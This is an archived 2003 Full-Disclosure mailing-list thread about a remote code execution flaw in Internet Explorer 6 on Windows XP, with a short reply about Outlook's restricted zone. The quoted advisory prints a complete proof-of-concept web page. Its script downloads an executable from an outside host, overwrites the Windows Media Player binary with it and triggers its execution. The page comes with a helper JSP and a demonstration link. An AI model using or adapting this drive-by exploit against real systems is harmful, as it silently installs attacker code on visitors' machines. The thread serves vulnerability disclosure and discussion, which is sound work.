lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
From: jkuperus at planet.nl (jelmer)
Subject: Internet explorer 6 on windows XP allows
 exection of arbitrary code

when viewing mail in recent versions of outlook it operates in the
restricted zone ,eg no active scripting allowed to run, so these wont be
exploitable
unless someone proofs otherwise that is ;)



----- Original Message ----- 
From: "Kristian Hermansen" <khermansen@...technology.com>
To: "Full Disclosure" <full-disclosure@...ts.netsys.com>
Sent: Friday, September 12, 2003 2:40 AM
Subject: Re: [Full-Disclosure] Internet explorer 6 on windows XP allows
exection of arbitrary code


> Wow, this one is pretty scary.  Nice work putting it together.  Does
anyone
> know if Outlook is exploitable with this?  I'd think that Outlook would
not
> try to play the media file, but I'm not quite sure.  Wow, what a rush of
> pretty critical bugs lately!!!
>
> Kris Hermansen
>
>
> ----- Original Message ----- 
> From: "jelmer" <jkuperus@...net.nl>
> To: <bugtraq@...urityfocus.com>
> Cc: <full-disclosure@...ts.netsys.com>
> Sent: Thursday, September 11, 2003 6:31 PM
> Subject: [Full-Disclosure] Internet explorer 6 on windows XP allows
exection
> of arbitrary code
>
>
> > Internet explorer 6 on windows XP allows exection of arbitrary code
> >
> > DESCRIPTION :
> >
> > Yesterday Liu Die Yu released a number series of advisories concerning
> > internet explorer
> > by combining on of these issues with an earlier issue I myself reported
a
> > while back
> > You can construct a specially crafted webpage that can take any action
on
> a
> > users system
> > including but not limited to, installing trojans, keyloggers, wiping the
> > users harddrive etc.
> >
> >
> > TECHNICAL EXPLAINATION :
> >
> > Internet explorer 6 comes with a media sidebar in wich you can load and
> play
> > mediaclips
> > without even leaving the browser. when you instruct the mediabar to load
a
> > file from an
> > unknown host or the HTTP status returned by an existing host indicates
an
> > error
> > this media bar displays an error page inside the media bar namely
> >
> > res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path
> >
> > res URL's are treated as being in the "my computer zone" and are loaded
> from
> > the users filesystem
> > perfect conditions for the issue I describe on
> >
> >
http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg06791.html
> >
> > To work. now all that is needed is a way to inject this exploit code
into
> > this page
> > This method was graciously provided by Liu Die Yu as you can read on
> >
> > http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0
> >
> > Combining these issues we get something like :
> >
> > --snip--
> >
> > <textarea id="code" style="display:none;">
> >
> >     var x = new ActiveXObject("Microsoft.XMLHTTP");
> >     x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
> >     x.Send();
> >
> >     var s = new ActiveXObject("ADODB.Stream");
> >     s.Mode = 3;
> >     s.Type = 1;
> >     s.Open();
> >     s.Write(x.responseBody);
> >
> >     s.SaveToFile("C:\\Program Files\\Windows Media
> Player\\wmplayer.exe",2);
> >     location.href = "mms://";
> >
> > </textarea>
> >
> > <script language="javascript">
> >
> >     function preparecode(code) {
> >         result = '';
> >         lines = code.split(/\r\n/);
> >         for (i=0;i<lines.length;i++) {
> >
> >             line = lines[i];
> >             line = line.replace(/^\s+/,"");
> >             line = line.replace(/\s+$/,"");
> >             line = line.replace(/'/g,"\\'");
> >             line = line.replace(/[\\]/g,"\\\\");
> >             line = line.replace(/[/]/g,"%2f");
> >
> >             if (line != '') {
> >                 result += line +'\\r\\n';
> >             }
> >         }
> >         return result;
> >     }
> >
> >     function doit() {
> >         mycode = preparecode(document.all.code.value);
> >         myURL = "file:javascript:eval('" + mycode + "')";
> >         window.open(myURL,"_media")
> >     }
> >
> >
> >     window.open("error.jsp","_media");
> >
> >     setTimeout("doit()", 5000);
> >
> >
> > </script>
> >
> > --snip--
> >
> > error.jsp is a jsp page that consists of one line, namely
> >
> > <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>
> >
> >
> > DEMONSTRATION :
> >
> > A demonstration is provided at :
> >
> > http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
> >
> >
> > WORKAROUND :
> >
> > Disable active scripting or do "the sensible thing" and pick another
> browser
> > such as the
> > excellent mozilla firebird.
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ